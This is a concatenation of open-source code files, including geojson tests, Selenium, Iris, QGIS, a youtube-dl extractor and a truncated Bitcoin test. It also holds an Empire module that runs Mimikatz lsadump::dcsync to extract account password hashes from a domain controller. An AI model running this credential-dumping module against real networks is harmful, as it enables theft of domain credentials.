self.assertEqual(destination_point(startpoint, 180, 2000)["coordinates"][0], -122.26000070571902)
def test_distance_ellipsode(self):
from geojson_utils import point_distance_ellipsode
fairyland_str = '{"type": "Point", "coordinates": [-122.260000705719, 37.80919060818706]}'
navalbase_str = '{"type": "Point", "coordinates": [-122.32083320617676, 37.78774223089045]}'
fairyland = json.loads(fairyland_str)
navalbase = json.loads(navalbase_str)
self.assertAlmostEqual(math.floor(point_distance_ellipsode(fairyland,navalbase)),2380)
def test_featurecollection(self):
from geojson_utils import merge_featurecollection
with open('tests/first.json','r') as fp:
first = json.load(fp)
with open('tests/second.json','r') as fp:
second = json.load(fp)
with open('tests/result.json','r') as fp:
result = json.load(fp)
self.assertEqual(merge_featurecollection(first,second), result)
def test_convertor(self):
from geojson_utils import convertor
with open('tests/province_wgs.geojson', encoding='utf-8') as fp:
geojson = json.load(fp)
features = geojson['features']
for feature in features:
origin = feature['geometry']['coordinates'][0][0][0]
result = convertor(feature['geometry'])
self.assertNotEqual(origin,result['coordinates'][0][0][0])
if __name__ == '__main__':
unittest.main()
| mit |
krmahadevan/selenium | py/selenium/webdriver/remote/switch_to.py | 13 | 4610 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from .command import Command
from selenium.webdriver.common.alert import Alert
from selenium.webdriver.common.by import By
from selenium.common.exceptions import NoSuchElementException, NoSuchFrameException, NoSuchWindowException
try:
basestring
except NameError:
basestring = str
class SwitchTo:
def __init__(self, driver):
self._driver = driver
@property
def active_element(self):
"""
Returns the element with focus, or BODY if nothing has focus.
:Usage:
element = driver.switch_to.active_element
"""
if self._driver.w3c:
return self._driver.execute(Command.W3C_GET_ACTIVE_ELEMENT)['value']
else:
return self._driver.execute(Command.GET_ACTIVE_ELEMENT)['value']
@property
def alert(self):
"""
Switches focus to an alert on the page.
:Usage:
alert = driver.switch_to.alert
"""
alert = Alert(self._driver)
alert.text
return alert
def default_content(self):
"""
Switch focus to the default frame.
:Usage:
driver.switch_to.default_content()
"""
self._driver.execute(Command.SWITCH_TO_FRAME, {'id': None})
def frame(self, frame_reference):
"""
Switches focus to the specified frame, by index, name, or webelement.
:Args:
- frame_reference: The name of the window to switch to, an integer representing the index,
or a webelement that is an (i)frame to switch to.
:Usage:
driver.switch_to.frame('frame_name')
driver.switch_to.frame(1)
driver.switch_to.frame(driver.find_elements_by_tag_name("iframe")[0])
"""
if isinstance(frame_reference, basestring) and self._driver.w3c:
try:
frame_reference = self._driver.find_element(By.ID, frame_reference)
except NoSuchElementException:
try:
frame_reference = self._driver.find_element(By.NAME, frame_reference)
except NoSuchElementException:
raise NoSuchFrameException(frame_reference)
self._driver.execute(Command.SWITCH_TO_FRAME, {'id': frame_reference})
def parent_frame(self):
"""
Switches focus to the parent context. If the current context is the top
level browsing context, the context remains unchanged.
:Usage:
driver.switch_to.parent_frame()
"""
self._driver.execute(Command.SWITCH_TO_PARENT_FRAME)
def window(self, window_name):
"""
Switches focus to the specified window.
:Args:
- window_name: The name or window handle of the window to switch to.
:Usage:
driver.switch_to.window('main')
"""
if self._driver.w3c:
self._w3c_window(window_name)
return
data = {'name': window_name}
self._driver.execute(Command.SWITCH_TO_WINDOW, data)
def _w3c_window(self, window_name):
def send_handle(h):
self._driver.execute(Command.SWITCH_TO_WINDOW, {'handle': h})
try:
# Try using it as a handle first.
send_handle(window_name)
except NoSuchWindowException as e:
# Check every window to try to find the given window name.
original_handle = self._driver.current_window_handle
handles = self._driver.window_handles
for handle in handles:
send_handle(handle)
current_name = self._driver.execute_script('return window.name')
if window_name == current_name:
return
send_handle(original_handle)
raise e
| apache-2.0 |
bjlittle/iris | tools/gen_translations.py | 6 | 7503 | # Copyright Iris contributors
#
# This file is part of Iris and is released under the LGPL license.
# See COPYING and COPYING.LESSER in the root of the repository for full
# licensing details.
"""
Processing of metarelate metOcean content to provide Iris encodings of
metOcean mapping translations.
"""
from datetime import datetime
import os.path
import requests
import sys
import metarelate
from metarelate.fuseki import FusekiServer
from translator import (FORMAT_URIS, FieldcodeCFMappings, StashCFNameMappings,
StashCFHeightConstraintMappings,
CFFieldcodeMappings,
GRIB1LocalParamCFConstrainedMappings,
GRIB1LocalParamCFMappings, GRIB2ParamCFMappings,
CFConstrainedGRIB1LocalParamMappings,
CFGRIB2ParamMappings, CFGRIB1LocalParamMappings)
HEADER = """# Copyright {name} contributors
#
# This file is part of {name} and is released under the LGPL license.
# See COPYING and COPYING.LESSER in the root of the repository for full
# licensing details.
#
# DO NOT EDIT: AUTO-GENERATED
# Created on {datestamp} from
# http://www.metarelate.net/metOcean
# at commit {git_sha}
# https://github.com/metarelate/metOcean/commit/{git_sha}
{doc_string}
from collections import namedtuple
CFName = namedtuple('CFName', 'standard_name long_name units')
"""
HEADER_GRIB = """
DimensionCoordinate = namedtuple('DimensionCoordinate',
'standard_name units points')
G1LocalParam = namedtuple('G1LocalParam', 'edition t2version centre iParam')
G2Param = namedtuple('G2Param', 'edition discipline category number')
"""
DOC_STRING_GRIB = r'''"""
Provides GRIB/CF phenomenon translations.
"""'''
DOC_STRING_UM = r'''"""
Provides UM/CF phenomenon translations.
"""'''
YEAR = datetime.utcnow().year
def _retrieve_mappings(fuseki, source, target):
"""
Interrogate the metarelate triple store for all
phenomenon translation mappings from the source
scheme to the target scheme.
Args:
* fuseki:
The :class:`metrelate.fuseki.FusekiServer` instance.
* source:
The source metarelate metadata type for the mapping.
* target:
The target metarelate metadata type for the mapping.
Return:
The sequence of :class:`metarelate.Mapping`
instances.
"""
suri = 'http://www.metarelate.net/sparql/metOcean'
msg = 'Retrieving {!r} to {!r} mappings ...'
print(msg.format(source, target))
return fuseki.retrieve_mappings(source, target, service=suri)
def build_um_cf_map(fuseki, now, git_sha, base_dir):
"""
Encode the UM/CF phenomenon translation mappings
within the specified file.
Args:
* fuseki:
The :class:`metarelate.fuseki.FusekiServer` instance.
* now:
Time stamp to write into the file
* git_sha:
The git SHA1 of the metarelate commit
* base_dir:
The root directory of the Iris source.
"""
filename = os.path.join(base_dir, 'lib', 'iris', 'fileformats',
'um_cf_map.py')
# Create the base directory.
if not os.path.exists(os.path.dirname(filename)):
os.makedirs(os.path.dirname(filename))
# Create the file to contain UM/CF translations.
with open(filename, 'w') as fh:
fh.write(HEADER.format(year=YEAR, doc_string=DOC_STRING_UM,
datestamp=now, git_sha=git_sha, name='Iris'))
fh.write('\n')
# Encode the relevant UM to CF translations.
maps = _retrieve_mappings(fuseki, FORMAT_URIS['umf'],
FORMAT_URIS['cff'])
# create the collections, then call lines on each one
# for thread safety during lines and encode
fccf = FieldcodeCFMappings(maps)
stcf = StashCFNameMappings(maps)
stcfhcon = StashCFHeightConstraintMappings(maps)
fh.writelines(fccf.lines(fuseki))
fh.writelines(stcf.lines(fuseki))
fh.writelines(stcfhcon.lines(fuseki))
# Encode the relevant CF to UM translations.
maps = _retrieve_mappings(fuseki, FORMAT_URIS['cff'],
FORMAT_URIS['umf'])
# create the collections, then call lines on each one
# for thread safety during lines and encode
cffc = CFFieldcodeMappings(maps)
fh.writelines(cffc.lines(fuseki))
def build_grib_cf_map(fuseki, now, git_sha, base_dir):
"""
Encode the GRIB/CF phenomenon translation mappings
within the specified file.
Args:
* fuseki:
The :class:`metarelate.fuseki.FusekiServer` instance.
* now:
Time stamp to write into the file
* git_sha:
The git SHA1 of the metarelate commit
* base_dir:
The root directory of the Iris source.
"""
filename = os.path.join(base_dir, 'lib', 'iris', 'fileformats',
'grib', '_grib_cf_map.py')
if not os.path.exists(os.path.dirname(filename)):
os.makedirs(os.path.dirname(filename))
# Create the file to contain GRIB/CF translations.
with open(filename, 'w') as fh:
fh.write(HEADER.format(year=YEAR, doc_string=DOC_STRING_GRIB,
datestamp=now, git_sha=git_sha,
name='iris-grib'))
fh.write(HEADER_GRIB)
fh.write('\n')
# Encode the relevant GRIB to CF translations.
maps = _retrieve_mappings(fuseki, FORMAT_URIS['gribm'],
FORMAT_URIS['cff'])
# create the collections, then call lines on each one
# for thread safety during lines and encode
g1cfc = GRIB1LocalParamCFConstrainedMappings(maps)
g1c = GRIB1LocalParamCFMappings(maps)
g2c = GRIB2ParamCFMappings(maps)
fh.writelines(g1cfc.lines(fuseki))
fh.writelines(g1c.lines(fuseki))
fh.writelines(g2c.lines(fuseki))
# Encode the relevant CF to GRIB translations.
maps = _retrieve_mappings(fuseki, FORMAT_URIS['cff'],
FORMAT_URIS['gribm'])
# create the collections, then call lines on each one
# for thread safety during lines and encode
cfcg1 = CFConstrainedGRIB1LocalParamMappings(maps)
cg1 = CFGRIB1LocalParamMappings(maps)
cg2 = CFGRIB2ParamMappings(maps)
fh.writelines(cfcg1.lines(fuseki))
fh.writelines(cg1.lines(fuseki))
fh.writelines(cg2.lines(fuseki))
def main():
# Protect metarelate resource from 1.0 emergent bug
if not float(metarelate.__version__) >= 1.1:
raise ValueError("Please ensure that Metarelate Version is >= 1.1")
now = datetime.utcnow().strftime('%d %B %Y %H:%m')
git_sha = requests.get('http://www.metarelate.net/metOcean/latest_sha').text
gen_path = os.path.abspath(sys.modules['__main__'].__file__)
iris_path = os.path.dirname(os.path.dirname(gen_path))
with FusekiServer() as fuseki:
build_um_cf_map(fuseki, now, git_sha, iris_path)
build_grib_cf_map(fuseki, now, git_sha, iris_path)
if (git_sha !=
requests.get('http://www.metarelate.net/metOcean/latest_sha').text):
raise ValueError('The metarelate translation store has altered during'
'your retrieval, the results may not be stable.\n'
'Please rerun your retrieval.')
if __name__ == '__main__':
main()
| lgpl-3.0 |
timlinux/QGIS | python/plugins/processing/algs/qgis/PointsDisplacement.py | 30 | 7999 | # -*- coding: utf-8 -*-
"""
***************************************************************************
PointsDisplacement.py
---------------------
Date : July 2013
Copyright : (C) 2013 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Alexander Bruy'
__date__ = 'July 2013'
__copyright__ = '(C) 2013, Alexander Bruy'
import math
from qgis.core import (QgsFeatureSink,
QgsGeometry,
QgsPointXY,
QgsSpatialIndex,
QgsRectangle,
QgsProcessing,
QgsProcessingException,
QgsProcessingParameterFeatureSource,
QgsProcessingParameterDistance,
QgsProcessingParameterBoolean,
QgsProcessingParameterFeatureSink)
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
class PointsDisplacement(QgisAlgorithm):
INPUT = 'INPUT'
DISTANCE = 'DISTANCE'
PROXIMITY = 'PROXIMITY'
HORIZONTAL = 'HORIZONTAL'
OUTPUT = 'OUTPUT'
def group(self):
return self.tr('Vector geometry')
def groupId(self):
return 'vectorgeometry'
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
self.addParameter(QgsProcessingParameterFeatureSource(self.INPUT,
self.tr('Input layer'), [QgsProcessing.TypeVectorPoint]))
self.addParameter(QgsProcessingParameterDistance(self.PROXIMITY,
self.tr('Minimum distance to other points'), parentParameterName='INPUT',
minValue=0.00001, defaultValue=1.0))
self.addParameter(QgsProcessingParameterDistance(self.DISTANCE,
self.tr('Displacement distance'), parentParameterName='INPUT',
minValue=0.00001, defaultValue=1.0))
self.addParameter(QgsProcessingParameterBoolean(self.HORIZONTAL,
self.tr('Horizontal distribution for two point case')))
self.addParameter(QgsProcessingParameterFeatureSink(self.OUTPUT, self.tr('Displaced'), QgsProcessing.TypeVectorPoint))
def name(self):
return 'pointsdisplacement'
def displayName(self):
return self.tr('Points displacement')
def processAlgorithm(self, parameters, context, feedback):
source = self.parameterAsSource(parameters, self.INPUT, context)
if source is None:
raise QgsProcessingException(self.invalidSourceError(parameters, self.INPUT))
proximity = self.parameterAsDouble(parameters, self.PROXIMITY, context)
radius = self.parameterAsDouble(parameters, self.DISTANCE, context)
horizontal = self.parameterAsBoolean(parameters, self.HORIZONTAL, context)
(sink, dest_id) = self.parameterAsSink(parameters, self.OUTPUT, context,
source.fields(), source.wkbType(), source.sourceCrs())
if sink is None:
raise QgsProcessingException(self.invalidSinkError(parameters, self.OUTPUT))
features = source.getFeatures()
total = 100.0 / source.featureCount() if source.featureCount() else 0
def searchRect(p):
return QgsRectangle(p.x() - proximity, p.y() - proximity, p.x() + proximity, p.y() + proximity)
index = QgsSpatialIndex()
# NOTE: this is a Python port of QgsPointDistanceRenderer::renderFeature. If refining this algorithm,
# please port the changes to QgsPointDistanceRenderer::renderFeature also!
clustered_groups = []
group_index = {}
group_locations = {}
for current, f in enumerate(features):
if feedback.isCanceled():
break
if not f.hasGeometry():
continue
point = f.geometry().asPoint()
other_features_within_radius = index.intersects(searchRect(point))
if not other_features_within_radius:
index.addFeature(f)
group = [f]
clustered_groups.append(group)
group_index[f.id()] = len(clustered_groups) - 1
group_locations[f.id()] = point
else:
# find group with closest location to this point (may be more than one within search tolerance)
min_dist_feature_id = other_features_within_radius[0]
min_dist = group_locations[min_dist_feature_id].distance(point)
for i in range(1, len(other_features_within_radius)):
candidate_id = other_features_within_radius[i]
new_dist = group_locations[candidate_id].distance(point)
if new_dist < min_dist:
min_dist = new_dist
min_dist_feature_id = candidate_id
group_index_pos = group_index[min_dist_feature_id]
group = clustered_groups[group_index_pos]
# calculate new centroid of group
old_center = group_locations[min_dist_feature_id]
group_locations[min_dist_feature_id] = QgsPointXY((old_center.x() * len(group) + point.x()) / (len(group) + 1.0),
(old_center.y() * len(group) + point.y()) / (len(group) + 1.0))
# add to a group
clustered_groups[group_index_pos].append(f)
group_index[f.id()] = group_index_pos
feedback.setProgress(int(current * total))
current = 0
total = 100.0 / len(clustered_groups) if clustered_groups else 1
feedback.setProgress(0)
fullPerimeter = 2 * math.pi
for group in clustered_groups:
if feedback.isCanceled():
break
count = len(group)
if count == 1:
sink.addFeature(group[0], QgsFeatureSink.FastInsert)
else:
angleStep = fullPerimeter / count
if count == 2 and horizontal:
currentAngle = math.pi / 2
else:
currentAngle = 0
old_point = group_locations[group[0].id()]
for f in group:
if feedback.isCanceled():
break
sinusCurrentAngle = math.sin(currentAngle)
cosinusCurrentAngle = math.cos(currentAngle)
dx = radius * sinusCurrentAngle
dy = radius * cosinusCurrentAngle
# we want to keep any existing m/z values
point = f.geometry().constGet().clone()
point.setX(old_point.x() + dx)
point.setY(old_point.y() + dy)
f.setGeometry(QgsGeometry(point))
sink.addFeature(f, QgsFeatureSink.FastInsert)
currentAngle += angleStep
current += 1
feedback.setProgress(int(current * total))
return {self.OUTPUT: dest_id}
| gpl-2.0 |
longman694/youtube-dl | youtube_dl/extractor/kaltura.py | 16 | 14151 | # coding: utf-8
from __future__ import unicode_literals
import re
import base64
from .common import InfoExtractor
from ..compat import (
compat_urlparse,
compat_parse_qs,
)
from ..utils import (
clean_html,
ExtractorError,
int_or_none,
unsmuggle_url,
smuggle_url,
)
class KalturaIE(InfoExtractor):
_VALID_URL = r'''(?x)
(?:
kaltura:(?P<partner_id>\d+):(?P<id>[0-9a-z_]+)|
https?://
(:?(?:www|cdnapi(?:sec)?)\.)?kaltura\.com(?::\d+)?/
(?:
(?:
# flash player
index\.php/(?:kwidget|extwidget/preview)|
# html5 player
html5/html5lib/[^/]+/mwEmbedFrame\.php
)
)(?:/(?P<path>[^?]+))?(?:\?(?P<query>.*))?
)
'''
_SERVICE_URL = 'http://cdnapi.kaltura.com'
_SERVICE_BASE = '/api_v3/index.php'
# See https://github.com/kaltura/server/blob/master/plugins/content/caption/base/lib/model/enums/CaptionType.php
_CAPTION_TYPES = {
1: 'srt',
2: 'ttml',
3: 'vtt',
}
_TESTS = [
{
'url': 'kaltura:269692:1_1jc2y3e4',
'md5': '3adcbdb3dcc02d647539e53f284ba171',
'info_dict': {
'id': '1_1jc2y3e4',
'ext': 'mp4',
'title': 'Straight from the Heart',
'upload_date': '20131219',
'uploader_id': 'mlundberg@wolfgangsvault.com',
'description': 'The Allman Brothers Band, 12/16/1981',
'thumbnail': 're:^https?://.*/thumbnail/.*',
'timestamp': int,
},
},
{
'url': 'http://www.kaltura.com/index.php/kwidget/cache_st/1300318621/wid/_269692/uiconf_id/3873291/entry_id/1_1jc2y3e4',
'only_matching': True,
},
{
'url': 'https://cdnapisec.kaltura.com/index.php/kwidget/wid/_557781/uiconf_id/22845202/entry_id/1_plr1syf3',
'only_matching': True,
},
{
'url': 'https://cdnapisec.kaltura.com/html5/html5lib/v2.30.2/mwEmbedFrame.php/p/1337/uiconf_id/20540612/entry_id/1_sf5ovm7u?wid=_243342',
'only_matching': True,
},
{
# video with subtitles
'url': 'kaltura:111032:1_cw786r8q',
'only_matching': True,
},
{
# video with ttml subtitles (no fileExt)
'url': 'kaltura:1926081:0_l5ye1133',
'info_dict': {
'id': '0_l5ye1133',
'ext': 'mp4',
'title': 'What Can You Do With Python?',
'upload_date': '20160221',
'uploader_id': 'stork',
'thumbnail': 're:^https?://.*/thumbnail/.*',
'timestamp': int,
'subtitles': {
'en': [{
'ext': 'ttml',
}],
},
},
'skip': 'Gone. Maybe https://www.safaribooksonline.com/library/tutorials/introduction-to-python-anon/3469/',
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.kaltura.com/index.php/extwidget/preview/partner_id/1770401/uiconf_id/37307382/entry_id/0_58u8kme7/embed/iframe?&flashvars[streamerType]=auto',
'only_matching': True,
},
{
'url': 'https://www.kaltura.com:443/index.php/extwidget/preview/partner_id/1770401/uiconf_id/37307382/entry_id/0_58u8kme7/embed/iframe?&flashvars[streamerType]=auto',
'only_matching': True,
}
]
@staticmethod
def _extract_url(webpage):
# Embed codes: https://knowledge.kaltura.com/embedding-kaltura-media-players-your-site
mobj = (
re.search(
r"""(?xs)
kWidget\.(?:thumb)?[Ee]mbed\(
\{.*?
(?P<q1>['"])wid(?P=q1)\s*:\s*
(?P<q2>['"])_?(?P<partner_id>(?:(?!(?P=q2)).)+)(?P=q2),.*?
(?P<q3>['"])entry_?[Ii]d(?P=q3)\s*:\s*
(?P<q4>['"])(?P<id>(?:(?!(?P=q4)).)+)(?P=q4)(?:,|\s*\})
""", webpage) or
re.search(
r'''(?xs)
(?P<q1>["'])
(?:https?:)?//cdnapi(?:sec)?\.kaltura\.com(?::\d+)?/(?:(?!(?P=q1)).)*\b(?:p|partner_id)/(?P<partner_id>\d+)(?:(?!(?P=q1)).)*
(?P=q1).*?
(?:
entry_?[Ii]d|
(?P<q2>["'])entry_?[Ii]d(?P=q2)
)\s*:\s*
(?P<q3>["'])(?P<id>(?:(?!(?P=q3)).)+)(?P=q3)
''', webpage) or
re.search(
r'''(?xs)
<iframe[^>]+src=(?P<q1>["'])
(?:https?:)?//(?:www\.)?kaltura\.com/(?:(?!(?P=q1)).)*\b(?:p|partner_id)/(?P<partner_id>\d+)
(?:(?!(?P=q1)).)*
[?&]entry_id=(?P<id>(?:(?!(?P=q1))[^&])+)
(?P=q1)
''', webpage)
)
if mobj:
embed_info = mobj.groupdict()
url = 'kaltura:%(partner_id)s:%(id)s' % embed_info
escaped_pid = re.escape(embed_info['partner_id'])
service_url = re.search(
r'<script[^>]+src=["\']((?:https?:)?//.+?)/p/%s/sp/%s00/embedIframeJs' % (escaped_pid, escaped_pid),
webpage)
if service_url:
url = smuggle_url(url, {'service_url': service_url.group(1)})
return url
def _kaltura_api_call(self, video_id, actions, service_url=None, *args, **kwargs):
params = actions[0]
if len(actions) > 1:
for i, a in enumerate(actions[1:], start=1):
for k, v in a.items():
params['%d:%s' % (i, k)] = v
data = self._download_json(
(service_url or self._SERVICE_URL) + self._SERVICE_BASE,
video_id, query=params, *args, **kwargs)
status = data if len(actions) == 1 else data[0]
if status.get('objectType') == 'KalturaAPIException':
raise ExtractorError(
'%s said: %s' % (self.IE_NAME, status['message']))
return data
def _get_video_info(self, video_id, partner_id, service_url=None):
actions = [
{
'action': 'null',
'apiVersion': '3.1.5',
'clientTag': 'kdp:v3.8.5',
'format': 1, # JSON, 2 = XML, 3 = PHP
'service': 'multirequest',
},
{
'expiry': 86400,
'service': 'session',
'action': 'startWidgetSession',
'widgetId': '_%s' % partner_id,
},
{
'action': 'get',
'entryId': video_id,
'service': 'baseentry',
'ks': '{1:result:ks}',
},
{
'action': 'getbyentryid',
'entryId': video_id,
'service': 'flavorAsset',
'ks': '{1:result:ks}',
},
{
'action': 'list',
'filter:entryIdEqual': video_id,
'service': 'caption_captionasset',
'ks': '{1:result:ks}',
},
]
return self._kaltura_api_call(
video_id, actions, service_url, note='Downloading video info JSON')
def _real_extract(self, url):
url, smuggled_data = unsmuggle_url(url, {})
mobj = re.match(self._VALID_URL, url)
partner_id, entry_id = mobj.group('partner_id', 'id')
ks = None
captions = None
if partner_id and entry_id:
_, info, flavor_assets, captions = self._get_video_info(entry_id, partner_id, smuggled_data.get('service_url'))
else:
path, query = mobj.group('path', 'query')
if not path and not query:
raise ExtractorError('Invalid URL', expected=True)
params = {}
if query:
params = compat_parse_qs(query)
if path:
splitted_path = path.split('/')
params.update(dict((zip(splitted_path[::2], [[v] for v in splitted_path[1::2]]))))
if 'wid' in params:
partner_id = params['wid'][0][1:]
elif 'p' in params:
partner_id = params['p'][0]
elif 'partner_id' in params:
partner_id = params['partner_id'][0]
else:
raise ExtractorError('Invalid URL', expected=True)
if 'entry_id' in params:
entry_id = params['entry_id'][0]
_, info, flavor_assets, captions = self._get_video_info(entry_id, partner_id)
elif 'uiconf_id' in params and 'flashvars[referenceId]' in params:
reference_id = params['flashvars[referenceId]'][0]
webpage = self._download_webpage(url, reference_id)
entry_data = self._parse_json(self._search_regex(
r'window\.kalturaIframePackageData\s*=\s*({.*});',
webpage, 'kalturaIframePackageData'),
reference_id)['entryResult']
info, flavor_assets = entry_data['meta'], entry_data['contextData']['flavorAssets']
entry_id = info['id']
# Unfortunately, data returned in kalturaIframePackageData lacks
# captions so we will try requesting the complete data using
# regular approach since we now know the entry_id
try:
_, info, flavor_assets, captions = self._get_video_info(
entry_id, partner_id)
except ExtractorError:
# Regular scenario failed but we already have everything
# extracted apart from captions and can process at least
# with this
pass
else:
raise ExtractorError('Invalid URL', expected=True)
ks = params.get('flashvars[ks]', [None])[0]
source_url = smuggled_data.get('source_url')
if source_url:
referrer = base64.b64encode(
'://'.join(compat_urlparse.urlparse(source_url)[:2])
.encode('utf-8')).decode('utf-8')
else:
referrer = None
def sign_url(unsigned_url):
if ks:
unsigned_url += '/ks/%s' % ks
if referrer:
unsigned_url += '?referrer=%s' % referrer
return unsigned_url
data_url = info['dataUrl']
if '/flvclipper/' in data_url:
data_url = re.sub(r'/flvclipper/.*', '/serveFlavor', data_url)
formats = []
for f in flavor_assets:
# Continue if asset is not ready
if f.get('status') != 2:
continue
# Original format that's not available (e.g. kaltura:1926081:0_c03e1b5g)
# skip for now.
if f.get('fileExt') == 'chun':
continue
if not f.get('fileExt'):
# QT indicates QuickTime; some videos have broken fileExt
if f.get('containerFormat') == 'qt':
f['fileExt'] = 'mov'
else:
f['fileExt'] = 'mp4'
video_url = sign_url(
'%s/flavorId/%s' % (data_url, f['id']))
# audio-only has no videoCodecId (e.g. kaltura:1926081:0_c03e1b5g
# -f mp4-56)
vcodec = 'none' if 'videoCodecId' not in f and f.get(
'frameRate') == 0 else f.get('videoCodecId')
formats.append({
'format_id': '%(fileExt)s-%(bitrate)s' % f,
'ext': f.get('fileExt'),
'tbr': int_or_none(f['bitrate']),
'fps': int_or_none(f.get('frameRate')),
'filesize_approx': int_or_none(f.get('size'), invscale=1024),
'container': f.get('containerFormat'),
'vcodec': vcodec,
'height': int_or_none(f.get('height')),
'width': int_or_none(f.get('width')),
'url': video_url,
})
if '/playManifest/' in data_url:
m3u8_url = sign_url(data_url.replace(
'format/url', 'format/applehttp'))
formats.extend(self._extract_m3u8_formats(
m3u8_url, entry_id, 'mp4', 'm3u8_native',
m3u8_id='hls', fatal=False))
self._sort_formats(formats)
subtitles = {}
if captions:
for caption in captions.get('objects', []):
# Continue if caption is not ready
if caption.get('status') != 2:
continue
if not caption.get('id'):
continue
caption_format = int_or_none(caption.get('format'))
subtitles.setdefault(caption.get('languageCode') or caption.get('language'), []).append({
'url': '%s/api_v3/service/caption_captionasset/action/serve/captionAssetId/%s' % (self._SERVICE_URL, caption['id']),
'ext': caption.get('fileExt') or self._CAPTION_TYPES.get(caption_format) or 'ttml',
})
return {
'id': entry_id,
'title': info['name'],
'formats': formats,
'subtitles': subtitles,
'description': clean_html(info.get('description')),
'thumbnail': info.get('thumbnailUrl'),
'duration': info.get('duration'),
'timestamp': info.get('createdAt'),
'uploader_id': info.get('userId') if info.get('userId') != 'None' else None,
'view_count': info.get('plays'),
}
| unlicense |
zhuyue1314/Empire | lib/modules/credentials/mimikatz/dcsync.py | 3 | 2901 | from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Mimikatz DCsync',
'Author': ['@gentilkiwi', '@JosephBialek'],
'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
"to extract a given account password through "
"Mimikatz's lsadump::dcsync module. This doesn't "
"need code execution on a given DC, but needs to be "
"run from a user context with DA equivalent privileges."),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'MinPSVersion' : '2',
'Comments': [
'http://blog.gentilkiwi.com',
'http://clymb3r.wordpress.com/'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'user' : {
'Description' : 'Username to extract the hash for (domain\username format).',
'Required' : True,
'Value' : ''
},
'domain' : {
'Description' : 'Specified (fqdn) domain to pull for the primary domain/DC.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
script += "Invoke-Mimikatz -Command "
script += "'\"lsadump::dcsync /user:" + self.options['user']['Value']
if self.options["domain"]['Value'] != "":
script += " /domain:" + self.options['domain']['Value']
script += "\"';"
return script
| bsd-3-clause |
SyndicateLtd/SyndicateQT | test/functional/feature_nulldummy.py | 4 | 5757 | #!/usr/bin/env python3
# Copyright (c) 2016-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test NULLDUMMY softfork.
Connect to a single node.
Generate 2 blocks (save the coinbases for later).
Generate 427 more blocks.
[Policy/Consensus] Check that NULLDUMMY compliant transactions are accepted in the 430th block.
[Policy] Check that non-NULLDUMMY transactions are rejected before activation.
[Consensus] Check that the new NULLDUMMY rules are not enforced on the 431st block.
[Policy/Consensus] Check that the new NULLDUMMY rules are enforced on the 432nd block.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.mininode import CTransaction, network_thread_start
from test_framework.blocktools import create_coinbase, create_block, add_witness_commitment
from test_framework.script import CScript
from io import BytesIO
import time
NULLDUMMY_ERROR = "64: non-mandatory-script-verify-flag (Dummy CHECKMULTISIG argument must be zero)"
def trueDummy(tx):
scriptSig = CScript(tx.vin[0].scriptSig)
newscript = []
for i in scriptSig:
if (len(newscript) == 0):
assert(len(i) == 0)
newscript.append(b'\x51')
else:
newscript.append(i)
tx.vin[0].scriptSig = CScript(newscript)
tx.rehash()
class NULLDUMMYTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
# This script tests NULLDUMMY activation, which is part of the 'segwit' deployment, so we go through
# Must set the blockversion for this test
self.extra_args = [['-whitelist=127.0.0.1']]
def run_test(self):
self.address = self.nodes[0].getnewaddress()
self.ms_address = self.nodes[0].addmultisigaddress(1,[self.address])
network_thread_start()
self.coinbase_blocks = self.nodes[0].generate(2) # Block 2
coinbase_txid = []
for i in self.coinbase_blocks:
coinbase_txid.append(self.nodes[0].getblock(i)['tx'][0])
self.nodes[0].generate(427) # Block 429
self.lastblockhash = self.nodes[0].getbestblockhash()
self.tip = int("0x" + self.lastblockhash, 0)
self.lastblockheight = 429
self.lastblocktime = int(time.time()) + 429
self.log.info("Test 1: NULLDUMMY compliant base transactions should be accepted to mempool and mined before activation [430]")
test1txs = [self.create_transaction(self.nodes[0], coinbase_txid[0], self.ms_address, 49)]
txid1 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[0].serialize_without_witness()), True)
test1txs.append(self.create_transaction(self.nodes[0], txid1, self.ms_address, 48))
txid2 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[1].serialize_without_witness()), True)
self.block_submit(self.nodes[0], test1txs, True)
self.log.info("Test 2: Non-NULLDUMMY base multisig transaction should not be accepted to mempool before activation")
test2tx = self.create_transaction(self.nodes[0], txid2, self.ms_address, 48)
trueDummy(test2tx)
txid4 = self.tx_submit(self.nodes[0], test2tx, NULLDUMMY_ERROR)
self.log.info("Test 3: Non-NULLDUMMY base transactions should be accepted in a block before activation [431]")
